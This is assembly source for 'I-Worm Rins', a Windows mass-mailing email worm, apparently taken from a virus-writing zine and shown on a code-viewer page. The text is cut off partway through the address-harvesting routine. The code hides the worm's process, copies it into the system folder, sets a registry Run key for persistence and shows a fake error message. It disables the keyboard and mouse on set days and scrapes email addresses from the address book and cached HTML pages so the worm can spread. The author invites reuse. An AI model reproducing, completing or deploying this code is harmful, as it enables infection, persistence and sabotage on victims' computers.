?? 29a-7.007
字號:
;-----------------------------------------------------------------------------
;------------------------------- -----------------------------------------
;----------------------------- ---------------------------------------
;--------------------------- I-Worm Rins ------------------------------------
;----------------------------- ---------------------------------------
;------------------------------- -----------------------------------------
;-----------------------------------------------------------------------------
; After my 1st worm (I-Worm.Netav) i tried in this one to reduce the
; size(No extrn cmd) and add a little sploit(MS01-20, thanx to mar00n).
; Feel free to use everything you want in this source code.
; Thanx to Petik and Benny, i learn a lot with your worms.
; Size = 5120
; tasm32 /ml /m9 xxx
; tlink32 -Tpe -aa xxx
; upx -9 xxx
.386p
.model flat
;--------------------------- Include Zone ------------------------------------
MEM_COMMIT equ 00001000h
MEM_RESERVE equ 00002000h
PAGE_READWRITE equ 00000004h
PAGE_READONLY equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 080h
OPEN_EXISTING equ 03h
FILE_SHARE_READ equ 01h
GENERIC_READ equ 80000000h
FILE_MAP_WRITE equ 00000002h
FILE_MAP_READ equ 00000004h
CREATE_ALWAYS equ 2
GENERIC_WRITE equ 40000000h
;-------------------------- Macro Zone ---------------------------------------
@INIT_SehFrame macro Instruction
local OurSeh
call OurSeh
mov esp,[esp+08h]
Instruction
OurSeh:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
endm
@REM_SehFrame macro
xor edx,edx
pop dword ptr fs:[edx]
pop edx
endm
@pushsz macro string
local Str
call Str
db string,0
Str: endm
api macro a
call dword ptr [a]
endm
;------------------------ Constantes Zone ------------------------------------
SEH equ 1 ; SEH protection
NbEmailWanted equ 80 ; Nb Email to Seek >1
EmailSize equ 64 ; Attention rol eax,6 (2^6)
EmailInMemSize equ (EmailSize*(NbEmailWanted+1)) ; For VirtualAlloc (+Security)
NbToSend equ 50 ; Send x emails per session
MimeHeaderSize equ 1024 ; Mime Header size
;-----------------------------------------------------------------------------
;--------------------------- Code Zone ---------------------------------------
;-----------------------------------------------------------------------------
.code
Rins:
pushad
IF SEH
@INIT_SehFrame <jmp ExitRins> ; Init SEH
ENDIF
;------------------------- Get Kernel Base + Api -----------------------------
KernelBase&Api:
call KBase&Api ; Get Kernel Base + Api
;------------------------- Check & Mark Presency -----------------------------
TryToOpenOurMutex:
xor eax, eax
@pushsz 'RinsMutex' ; Mutex Name
push eax
push eax
api _OpenMutexA ; already in mem
or eax,eax
jnz ExitRins ; Yes, do nothing more
CreateOurMutex:
xor eax, eax
@pushsz 'RinsMutex' ; Mutex Name
push eax ; No owner
push eax ; default security attrib
api _CreateMutexA ; create Our Mutex
mov dword ptr[MutexHdl], eax
;---------------------------- Random Init ------------------------------------
RandomInit:
api _GetTickCount
mov RandomNb, eax
;---------------------- Hide Process on Win9x --------------------------------
HideProcess:
xor eax, eax
mov eax, dword ptr [_RegisterServiceProcess]
test eax, eax
jz GetOurPathName
push 01h
push 00h
call eax
;----------------------- Copy Worm in Sys Dir --------------------------------
GetOurPathName:
xor eax, eax
push eax
api _GetModuleHandleA ; Our Handle
push 260
push offset MyPath
push eax
api _GetModuleFileNameA ; Our Path
CreateDestPath:
push 260
push offset TempPath&Name
api _GetSystemDirectoryA ; System Dir
@pushsz '\RINS.EXE'
push offset TempPath&Name
api _lstrcat ; Path+Name of File to Create
CheckHowExecuted:
push offset MyPath
push offset TempPath&Name
api _lstrcmp
test eax, eax
jz AutoRun
CreateOurFile:
xor eax, eax
push eax ; Overwrite mode set
push offset TempPath&Name
push offset MyPath
api _CopyFileA ; Copy Worm in Sys Dir
;------------------------- Registry Worm -------------------------------------
RegWorm:
push offset TempPath&Name
api _lstrlen
push eax
push offset TempPath&Name
push 1
@pushsz "Rins Task"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api _SHSetValueA
;-------------------- First Launch Fake Message ------------------------------
FakeMessage:
push 1040
@pushsz 'Status' ; maybe i should do
@pushsz 'Not Enought Memory' ; a little better
push 0
api _MessageBoxA
;----------------------- Emails address in Memory ----------------------------
AutoRun:
call EmailInMem ; Wab & Html emails in mem
;-------------------------- Spread the Worm ----------------------------------
Check_if_Connected:
push offset SystemTimeData
api _GetSystemTime
call PayAnniv
push 0
push offset IConnectedStateTemp
api _InternetGetConnectedState
dec eax
jnz No_internet ; No connection
call SendEmail ; Send Wab Email 1st+Rnd Email
jmp ExitRinsMutex ; Then Bye
No_internet:
push 5*60*1000 ; 5 min
api _Sleep
jmp Check_if_Connected
;----------------------------- The End ---------------------------------------
ExitRinsMutex:
push dword ptr[MutexHdl]
api _CloseHandle
call FreeTheMem
ExitRins:
IF SEH
@REM_SehFrame ; Restore SEH
ENDIF
popad
push 0
api _ExitProcess ; Quit
db '::::: I-Worm.Rins by Tony :::::',0dh,0dh
db '::::: V1.2 Light Size + Sploit :::::',0dh,0dh
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;------------------------- Sub Routine Zone ----------------------------------
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;........................ Major Sub Routine ..................................
;............................ Z O N E ........................................
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;............................ Payload ........................................
;.............................................................................
PayAnniv:
lea esi, SystemTimeData
movzx ecx, word ptr[esi+6] ; Esi point day
cmp ecx, 23 ; Anniv
je KeyboardOut
OtherOne:
cmp ecx, 17
jne NoPay
KeyboardOut:
push 0
@pushsz 'rundll32.exe keyboard,disable'
api _WinExec
MouseOut:
push 0
@pushsz 'rundll32.exe mouse,disable'
api _WinExec
NoPay:
ret
;....................... Emails @ in Memory ..................................
;.............................................................................
EmailInMem:
mov dword ptr[NbEmailFound], 0
ReserveMem_For_EmailInMem:
xor eax,eax
push PAGE_READWRITE ; read/write page
push MEM_RESERVE or MEM_COMMIT
push EmailInMemSize
push eax ; System decide where
api _VirtualAlloc
or eax,eax
jz EmailInMemError ; Alloc Fail
mov dword ptr[EmailList], eax
EmailSeeker:
call SearchWabFile_Email ; Search Email address book
call SearchHtmFile_Email ; Search Email HTML
EmailInMemError:
ret
;........................ Find Email in HTML .................................
;.............................................................................
; Recursive Search from Internet Path for Email in Html
SearchHtmFile_Email:
call Clear_TempPath&Name
push 00h
push 20h ; Internet Path
push offset TempPath&Name
push 00h
api _SHGetSpecialFolderPathA
push offset TempPath&Name
api _SetCurrentDirectoryA ; Selected dir = Internet Path
lea eax, SeekHtmlCurrentDir
mov dword ptr[RoutineToCall], eax
call AllSubDirSearch ; Action = SeekHtmlCurrentDir
ret
;.............. Seek Html in Current Dir
; IN: Selected Current dir
; OUT: Emails in reserved Mem
SeekHtmlCurrentDir:
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
je HtmlEmailSearchEnd ; YES...
lea edi, search
push edi
@pushsz '*.*htm*'
api _FindFirstFileA
inc eax
jne SeekEmail_Html
ret
SeekEmail_Html:
dec eax
xchg eax,esi
SeekEmail_Html_Loop:
call SeekEmail_In_ThisHtml ; Parse Html 4 emails
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
je HtmlEmailSearchFin ; YES...
push edi
push esi
api _FindNextFileA
dec eax
je SeekEmail_Html_Loop
HtmlEmailSearchFin:
push esi
api _FindClose
HtmlEmailSearchEnd:
ret
;.............. Parse Html for emails
SeekEmail_In_ThisHtml:
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
lea eax, [search.FileName]
push eax
api _CreateFileA
inc eax
je HtmlEmailSearchEnd
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
api _CreateFileMappingA
test eax,eax
je CloseHtmlHandle
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
api _MapViewOfFile
test eax,eax
je CloseHtml_MapHandle
xchg eax,esi
mov [maphandlemail],esi
mov [esi_save],esi
push 0
push ebx
api _GetFileSize
xchg eax,ecx
jecxz CloseHtml_MapViewHandle
inc ecx
jz CloseHtml_MapViewHandle ; GetFileSize Error ?
dec ecx
FixBugOverflow:
sub ecx, 8
cmp ecx, 0
jl CloseHtml_MapViewHandle
SeekMailToStr:
mov esi,[esi_save]
call MTStr
db 'mailto:'
MTStr:
pop edi
ScanFor_MailTo:
pushad
push 7
pop ecx
rep cmpsb ; search for "mailto:"
popad ; string
je MailToFound_CheckEmail ; check the mail address
inc esi
dec ecx
jnz ScanFor_MailTo
CloseHtml_MapViewHandle:
push [maphandlemail]
api _UnmapViewOfFile
CloseHtml_MapHandle:
push ebp
api _CloseHandle
CloseHtmlHandle:
push ebx
api _CloseHandle
popad
ret
MailToFound_CheckEmail:
inc esi
mov [esi_save],esi
dec esi
mov edi, dword ptr [EmailList] ; STORE THE EMAIL in the
mov edx, dword ptr [NbEmailFound]
rol edx, 6 ; 64 = email size stockage
add edi, edx ; goto next place
mov [EmailCurrentPos], edi
xor edx,edx
add esi,7
push edi ; mail address
NextChar:
lodsb
cmp al, ' '
je SkipChar
cmp al, '"' ; eMail End ?
je EndChar
cmp al, '?' ; eMail End ?
je EndChar
cmp al, '>' ; eMail End ?
je EndChar
cmp al, '<' ; eMail End ?
je EndChar
cmp al, ']' ; eMail End ?
je EndChar
cmp al, '''' ; eMail End ?
je EndChar
cmp al, '@' ; Valid email ?
jne CopyChar
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -